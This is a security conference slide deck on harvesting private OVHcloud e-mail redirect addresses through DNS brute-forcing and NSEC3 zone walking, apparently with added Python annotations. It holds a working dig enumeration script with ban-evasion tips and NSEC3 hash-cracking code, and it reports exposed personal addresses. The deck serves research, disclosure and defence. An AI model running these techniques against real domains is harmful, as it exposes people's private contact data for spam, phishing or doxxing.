DNSSECTION


What is this about

- An e-mail privacy breach in the largest French cloud provider
- The first practical attack based on DNSSEC zone walking
- A cautionary tale about hash functions


Why this matters

- DNS is everywhere: tons of potentially interesting data
- Zone walking has never been demonstrated in the wild before


Who we are

- Hadrien Barral, École Normale Supérieure / PSL University
- Rémi Géraud-Stewart, Ph.D., ENS/PSL, QPSI @ Qualcomm
- This is our second Defcon talk!

Done in collaboration with Amaury Barral and David Naccache.


1. Who's behind skytalks-vidz.com?


DNS 101

DNS: Domain Name System

- Naming system for remote resources
- Distributed database system (NOT a blockchain ffs)
- Contains domain names and the Resource Records (RRs) attached to them
- Resolver: figures out the translation of a domain name into an IP address
- Zones: subtrees of the name tree maintained by different people


Registrars and domain services 101

Scenario: you want to create a new website:
- Buy a computer
- Pay for Internet access
- Pay someone to design a fancy website running on your server
- Pay a registrar to get the domain name you want
- Pay someone to run DNS servers that connect the domain name to your server's IP
- Pay someone to maintain all of this

All-in-one: cloud hosting!


OVHcloud 101

OVHcloud

- Largest French cloud provider (2nd in Europe)
- They also sell domains
- And e-mail redirects with that

(and they have hosted WikiLeaks since 2010, just fyi)


E-mail redirects at OVHcloud

[Screenshots: the OVHcloud control panel for dnssection.ovh ("Automatic renewal scheduled for Apr 2021") and its "Create a redirection" dialog ("You are going to create a redirection for the dnssection.ovh account. Please enter the redirection information"), set up to redirect test@dnssection.ovh to target@yopmail.com with the "Do not store a copy of the email" option. Slide dated 6 Aug 2020.]
What harm can we do?

- Assume we access the redirection database...
- Loads of client information: names, e-mails, billing, ...

A few ideas pop to mind:

- Spam?
- Password dumps?
- Targeted attacks?
- Find weak hosts/email providers?
- Ammo for social engineering?
- Blackmail?
- Phishing?
- Lawsuits?
- Business recon?
- ...
Sudo bruteforce

- Get a list of OVHcloud-handled domains
- Get a sublist of interesting domains and DNS-query them (see commoncrawl.org)
  > Works fine for .fr, .ovh, less so for .com...
- Get redirection records for public emails (bear with us)
  > aka the emails we found on the webpage
- Bruteforce the associated DNS queries for usual e-mail addresses:
  {abuse, admin, contact}@example.com
- Do not get banned by the DNS server
How to do this in practice

- Do not get banned by the DNS server: rate limiting, several source IPs
- Low-tech version: bash + dig + filesystem

    # Pass 1: for every candidate domain, save its MX records and whatever
    # at.<domain> answers (the redirect records live under that label)
    while read -r DOMAIN; do
        dig MX "${DOMAIN}" > "./save/mx/${DOMAIN}"
        dig "at.${DOMAIN}" > "./save/at/${DOMAIN}"
    done < "domain_list.txt"

    # Pass 2: for the interesting domains, probe the TXT record of usual mailbox names
    while read -r DOMAIN; do
        for NAME in "abuse" "admin" "contact"; do   # extend with further common local parts
            EMAIL="${NAME}.at.${DOMAIN}"
            dig TXT "${EMAIL}" +noall +answer | grep "${EMAIL}.*IN.TXT"
        done
    done < "interesting_domain_list.txt"


Lookie here

- It works!
- Considering 14,000 potentially vulnerable domains (mostly .fr TLD),
- We found about 15,000 email redirects
- With about 10,000 unique target emails

Using public emails, we found (private) redirection emails!

What are we NOT seeing?


2. Stepping up: DNSSECTION


DNSSEC 101

- DNSSEC could be the topic of an entire talk
- Here's what you should know:
  > DNS is famously insecure, needed some fix
  > DNSSEC supported by every "good" modern device
  > Root of trust + chain of trust derived down the tree (DS records at each delegation)
  > Meant to ensure authenticity (not privacy)
- Sometimes requires lockpicking skills

Recent DNSSEC key rollover session

[Photo from a recent DNSSEC key rollover session. Source: @joao_damas]


Demo 


DNSViz 
The issue with negative responses

- Authenticating "example.com is at 1.2.3.4" is easy
- Authenticating the absence of a "bad.example.com" record is... trickier
- We obviously cannot put every negative possibility in the zone!
- NSEC to the rescue
- Principle:
  > NSEC signs "there is no name between apple.example.com and carrot.example.com"
  > Therefore bad.example.com does not exist
- But now we can enumerate all records!


Zone walking with NSEC

- But now we can enumerate all records!
  > Pick a random name: "fgfrd.example.com"
  > Query the DNS server. Answer: nothing between "carrot.example.com" and "good.example.com"
  > Repeat with "gooda.example.com"
  > We do this until we loop back to the start, at which point we're done!
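The walk described above, as an added example (not code from the talk): a constructed zone with its NSEC chain, a stand-in for dig that answers the way an NSEC-signed authoritative server does, and the walker itself. One difference from the slide: instead of appending a letter ("gooda.example.com" can jump over names such as good0.example.com or anything below good.example.com), the walker asks for the name that sorts immediately after the one it already knows, obtained by prepending a \000 label (the presentation form dig accepts is \000.good.example.com), so every NSEC in the chain is visited.

```python
"""Simulated NSEC zone walk (added example; the zone below is constructed)."""

ZONE_NAMES = [
    "example.com", "www.example.com", "mail.example.com",
    "apple.example.com", "carrot.example.com", "good.example.com",
    "ns.good.example.com",
]


def canonical_key(name):
    """Sort key for RFC 4034 canonical ordering: compare labels from the root,
    case-insensitively, octet by octet; a name that is a prefix of another sorts first."""
    return tuple(lbl.encode() for lbl in reversed(name.rstrip(".").lower().split(".")))


def build_nsec_chain(names):
    """NSEC chain of a signed zone: each name points to the next one in canonical
    order; the last record wraps around to the apex."""
    ordered = sorted(names, key=canonical_key)
    return [(ordered[i], ordered[(i + 1) % len(ordered)]) for i in range(len(ordered))]


CHAIN = build_nsec_chain(ZONE_NAMES)


def simulated_dig(qname, chain=CHAIN):
    """What an NSEC-signed authoritative server tells us about qname:
    ("exists", its NSEC) or ("nxdomain", the NSEC whose interval contains qname)."""
    k = canonical_key(qname)
    for owner, nxt in chain:
        if canonical_key(owner) == k:
            return "exists", (owner, nxt)
    for owner, nxt in chain:
        ko, kn = canonical_key(owner), canonical_key(nxt)
        wraps = kn <= ko                       # last record: 'next' is the apex
        if (ko < k < kn) or (wraps and (k > ko or k < kn)):
            return "nxdomain", (owner, nxt)
    raise RuntimeError("broken NSEC chain")


def walk_zone(query, apex):
    """Enumerate the zone: for each known name, ask for the smallest name sorting
    right after it (a \\000 label prepended). The NXDOMAIN answer carries the NSEC
    whose 'next' field is the following real name; stop when 'next' is the apex."""
    names = [apex]
    current = apex
    while True:
        probe = "\x00." + current
        status, (owner, nxt) = query(probe)
        if status == "exists":                 # pathological: the probe itself is real
            names.append(probe)
            current = probe
            continue
        if canonical_key(nxt) == canonical_key(apex):
            return names
        names.append(nxt)
        current = nxt


if __name__ == "__main__":
    print(simulated_dig("fgfrd.example.com"))
    for name in walk_zone(simulated_dig, "example.com"):
        print(name)
```

The only thing a real walker needs from the network is the NSEC record in an NXDOMAIN answer (`dig +dnssec`), which is what `simulated_dig` returns; everything else is local bookkeeping.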


NSEC is already obsolete

- Did you think that's what we were about to do?... guess again!
- NSEC zone walking does not work in the real world anymore!
- Indeed, NSEC is hardly used anymore (sad reacts only)


Zone walking with NSEC3

- NSEC3 (RFC 5155, RFC 6781)
  "The first motivation to deploy NSEC3 — prevention of zone enumeration (...)"
- NSEC3 in a nutshell: SHA-1*(domain), a salted, iterated SHA-1 of the name (almost universally)
  > Intuition: same as NSEC but with hashed values instead of real names
  > Should hide the contents (assuming you can't do anything with hash values)
  > We can still dump the SHA-1 hash itself, so zone walking still kinda works
- NSEC3 is what is deployed in the real world currently!

So let's attack that :)


Zone walking with NSEC3

Assumption: reversing even partially the hash is difficult.
(*laughs in Bitcoin mining farm*)

Reality: there are multiple off-the-shelf tools to crack NSEC3 hashes.

To the best of our knowledge, never been used to dig valuable data


nsec3walker 


Sudo GPU bruteforce

Bringing out the GPU rig!!!

JK, we "only" have this:


Demo 


hashcat 
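An added example (not the talk's tooling, i.e. neither nsec3walker nor hashcat) covering both the NSEC3 slides and the hashcat demo: the NSEC3 owner-name hash of RFC 5155 section 5 (salted, iterated SHA-1 over the name in lowercase wire format, base32hex-encoded), a dictionary attack run offline against the hashes a zone walk would return, and the lines one would feed to hashcat. The zone example.com, its salt, iteration count and wordlist are constructed; the `.at.` naming follows the redirect records probed earlier in the talk. The hashcat line format is given as I remember it for mode 8300 (hash:.zone:salt:iterations) and should be checked against `hashcat --example-hashes -m 8300`.

```python
"""NSEC3 owner hashing (RFC 5155 section 5) and an offline dictionary attack on
the hashed owners a zone walk returns. Added example; zone data is constructed."""
import base64
import hashlib

# base32 (RFC 4648) alphabet -> base32hex alphabet used for NSEC3 owner names
_B32_TO_B32HEX = str.maketrans("ABCDEFGHIJKLMNOPQRSTUVWXYZ234567",
                               "0123456789abcdefghijklmnopqrstuv")


def to_wire(name):
    """Canonical wire form of an owner name: lowercase labels, each length-prefixed,
    terminated by the empty root label."""
    name = name.rstrip(".").lower()
    if not name:
        return b"\x00"
    return b"".join(bytes([len(lbl)]) + lbl.encode() for lbl in name.split(".")) + b"\x00"


def nsec3_hash(name, salt, iterations):
    """IH(0) = SHA1(wire(name) || salt); IH(k) = SHA1(IH(k-1) || salt); result is
    IH(iterations), base32hex-encoded (20 bytes -> 32 characters, no padding)."""
    h = hashlib.sha1(to_wire(name) + salt).digest()
    for _ in range(iterations):
        h = hashlib.sha1(h + salt).digest()
    return base64.b32encode(h).decode().translate(_B32_TO_B32HEX)


def hashcat_lines(hashes, zone, salt, iterations):
    """One line per walked hash for 'hashcat -m 8300' (assumed format
    hash:.zone:salt_hex:iterations; verify with hashcat --example-hashes)."""
    return [f"{h}:.{zone}:{salt.hex()}:{iterations}" for h in hashes]


def crack_nsec3(hashed_owners, zone, salt, iterations, wordlist):
    """Dictionary attack: hash every candidate name under the zone and look it up
    among the hashes collected by the walk. Returns {hash: cleartext name}."""
    want = set(hashed_owners)
    candidates = [zone]                          # the apex itself is always in the zone
    for w in wordlist:
        candidates.append(f"{w}.{zone}")         # ordinary host names
        candidates.append(f"{w}.at.{zone}")      # naming scheme of the redirect records
    found = {}
    for cand in candidates:
        h = nsec3_hash(cand, salt, iterations)
        if h in want:
            found[h] = cand
    return found


# Constructed stand-in for a walked zone: only the owner hashes are "known" to us
ZONE = "example.com"
SALT = bytes.fromhex("1234abcd")
ITERATIONS = 5
SECRET_NAMES = [ZONE, f"www.{ZONE}", f"contact.at.{ZONE}", f"q7zk-private.at.{ZONE}"]
WALKED_HASHES = sorted(nsec3_hash(n, SALT, ITERATIONS) for n in SECRET_NAMES)
WORDLIST = ["www", "mail", "ftp", "abuse", "admin", "contact", "webmaster"]


if __name__ == "__main__":
    # RFC 5155 Appendix A apex hash (salt aabbccdd, 12 iterations): 0p9mhaveqvm6t7vbl5lop2u3t2rp3tom
    print(nsec3_hash("example", bytes.fromhex("aabbccdd"), 12))
    for line in hashcat_lines(WALKED_HASHES, ZONE, SALT, ITERATIONS):
        print(line)
    cracked = crack_nsec3(WALKED_HASHES, ZONE, SALT, ITERATIONS, WORDLIST)
    for h in WALKED_HASHES:
        print(h, "->", cracked.get(h, "(not cracked)"))
```

The salt does not slow the attacker down at all: it is public (NSEC3PARAM) and identical for every name in the zone, so one wordlist pass covers the whole zone, and the iteration count only multiplies the work by a small constant. A random label such as q7zk-private survives a dictionary attack, which is exactly why the conclusion says not to put private data in the zone in the first place.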


Results

Let's consider 16,000 interesting DNSSEC hashed records
Un-hashed 88% of them

Results breakdown
- 75%: reversed the hash, found an interesting email redirection
- 13%: reversed the hash, found something else
- 12%: unhash failed (sad face)

Let's look into the data!


3. All your data are belong to us 


Disclaimer

- We are not here to doxx people
- All people names and domain names in the following examples have been modified

With that in mind, let's dig into the data and tell you what we found :)


Some statistics

- Most webmasters' real addresses... @gmail.com
- Guessing name from email... about 50%
- Name couldn't be found on the website... about 66%
- Email wouldn't otherwise appear in a Google search... about 45%
- Identify business connections/conflict of interest/fake competitors... about 23%

Homework: how many of these email addresses have an entry in haveibeenpwned.com?


Can we use this power for "good"?

Try doxxing scam (and adult) websites!
- Don't tell my wife
- Fail: their email doesn't disclose their names
- (but we still have the emails, who's the scammer and who's the scammee now!)
Anything... serious?

- Some famous people's emails (mentioned on Wikipedia)
- A few personal emails of activists
- On a lighter note, a lawyer website with a redirect to... my.little.pony.1xxx@gmail.com
- ~50 redirects for noreply@. Really?


Caveat! Manual analysis

- We manually went through hundreds of websites, fishing for names and emails
  > Contact pages
  > Googling names and email addresses
  > Dealing with obscene stuff such as Adobe Flash websites
  > ...

This is all "best-effort", aka we might have missed public data
Disclosure with OVHcloud

- We called the hotline; they said "send a mail to abuse@"
- First email, including technical details... no reply
- Called the hotline again to confirm the process, which they did
- Second email... no reply
- Got someone working there to ping the right person and forward...

We're still waiting for a response :)


Fixing DNSSEC

- Use on-line signing ("DNSSEC white lies", RFC 4470, RFC 4471): sign, per query, an NSEC that covers only the queried name
- Either NSEC5? (2014)
  > Initial draft had issues, met with skepticism, not final, not standardised...
  > Latency...
  > Bad track record for the NSEC family
- Or NSEC5 with digital signatures?
  > Today most DNS servers would use Algorithm 13, i.e. ECDSA P-256 with SHA-256, because of fast signing and wide support
  > Verification is slow... so there's a burden on resolvers
  > Also requires proper management of keys and algorithms...

... experience shows that DNS servers are bad at it
(https://eprint.iacr.org/2015/1000.pdf)
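What the "white lies" option changes, as an added example (not the talk's code): instead of a precomputed chain, the server answers each NXDOMAIN with an NSEC whose owner is the immediate predecessor and whose 'next' is the immediate successor of the queried name (RFC 4470, using the name arithmetic of RFC 4471), so the interval contains nothing but the non-existent name and the walker from the earlier slides learns nothing. Assumptions: the zone is constructed, names are plain ASCII, the RRSIG that would accompany the record is omitted (the point is the covering interval), and only names short enough for the simple "prepend a \000 label" successor rule are handled.

```python
"""RFC 4470 'white lies': a minimally covering NSEC computed per query from the
immediate predecessor and successor of the name (RFC 4471, absolute method).
Added example; zone and queries are constructed."""

MAX_NAME = 255     # maximum wire length of a name: length octets + labels + root label
MAX_LABEL = 63


def labels_of(name):
    """Split a textual name into lowercase byte labels (plain ASCII names only)."""
    return [lbl.encode().lower() for lbl in name.rstrip(".").split(".")]


def presentation(labels):
    """Text form with non-printable octets escaped as \\DDD, the way dig prints them."""
    return ".".join(
        "".join(chr(c) if 0x21 <= c < 0x7f and c != 0x2e else "\\%03d" % c for c in lbl)
        for lbl in labels)


def key(labels):
    return tuple(reversed(labels))            # RFC 4034 canonical ordering


def wire_len(labels):
    return sum(len(lbl) + 1 for lbl in labels) + 1


def successor(labels):
    """Smallest name sorting after `labels`: prepend a one-octet \\000 label.
    Assumption: the name is short enough for that to fit in 255 octets."""
    if wire_len(labels) + 2 > MAX_NAME:
        raise ValueError("name too long for the simple successor rule")
    return [b"\x00"] + list(labels)


def _fill_to_max(labels, extend_first):
    """Grow the name as far as the 255-octet limit allows without changing its
    order: pad the first label with \\255 (when allowed), then prepend \\255 labels."""
    labels = list(labels)
    room = MAX_NAME - wire_len(labels)
    if extend_first:
        ext = min(MAX_LABEL - len(labels[0]), room)
        labels[0] += b"\xff" * ext
        room -= ext
    while room >= 2:                          # a new label costs its length octet plus data
        n = min(MAX_LABEL, room - 1)
        labels.insert(0, b"\xff" * n)
        room -= n + 1
    return labels


def predecessor(labels):
    """Largest name sorting before `labels` (not meant for the apex, which always exists)."""
    first, rest = bytearray(labels[0]), list(labels[1:])
    if first[-1] == 0:
        first = first[:-1]
        if not first:                         # "\000.N" is the successor of N, so N precedes it
            return rest
        # "ab\000" is preceded by the deepest name below "ab": do not extend "ab" itself
        return _fill_to_max([bytes(first)] + rest, extend_first=False)
    first[-1] -= 1                            # "bad" -> "bac", then pad with \255
    return _fill_to_max([bytes(first)] + rest, extend_first=True)


def white_lie(zone_names, qlabels):
    """The on-line signer's answer: ("exists", None) or the (owner, next) it would sign."""
    if key(qlabels) in {key(labels_of(n)) for n in zone_names}:
        return "exists", None
    return "nxdomain", (predecessor(qlabels), successor(qlabels))


def covers(owner, nxt, labels):
    return key(owner) < key(labels) < key(nxt)


def walk_attempt(zone_names, apex, steps):
    """What an NSEC walker gets out of a white-lie server: follow 'next' for `steps`
    queries and collect every real zone name that ever shows up in an answer."""
    real = {key(labels_of(n)): n for n in zone_names}
    learned = set()
    probe = successor(labels_of(apex))
    for _ in range(steps):
        status, rec = white_lie(zone_names, probe)
        if status == "exists":
            learned.add(real[key(probe)])
            probe = successor(probe)
            continue
        for n in rec:
            if key(n) in real:
                learned.add(real[key(n)])
        probe = successor(rec[1])
    return learned


ZONE = ["example.com", "www.example.com", "mail.example.com", "contact.at.example.com"]

if __name__ == "__main__":
    status, (owner, nxt) = white_lie(ZONE, labels_of("bad.example.com"))
    print(presentation(owner), "NSEC", presentation(nxt))
    print("learned by walking:", walk_attempt(ZONE, "example.com", 20))
```

Every answer is a tight interval around a name that does not exist, and the 'next' it hands out is itself non-existent, so the walker only ever circles inside names of the form \000.\000...; the price is a signature per NXDOMAIN query and the private key sitting on the authoritative server.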
Fixing my redirections

If you are an OVHcloud customer and use their redirections, how do you protect yourself?

- Protecting the target email is quite easy
- Protecting the domain email list is more difficult...


666. Conclusion 


Conclusion

- Do not store private info in your DNS zone
- DNSSEC NSEC3 attacks are practical
- Push for NSEC5 or ECDSA-alg13 adoption!


That's all folks

Proof of concept on: https://dnssection.ovh

Your friendly neighbourhood hackers
contact@dnssection.ovh


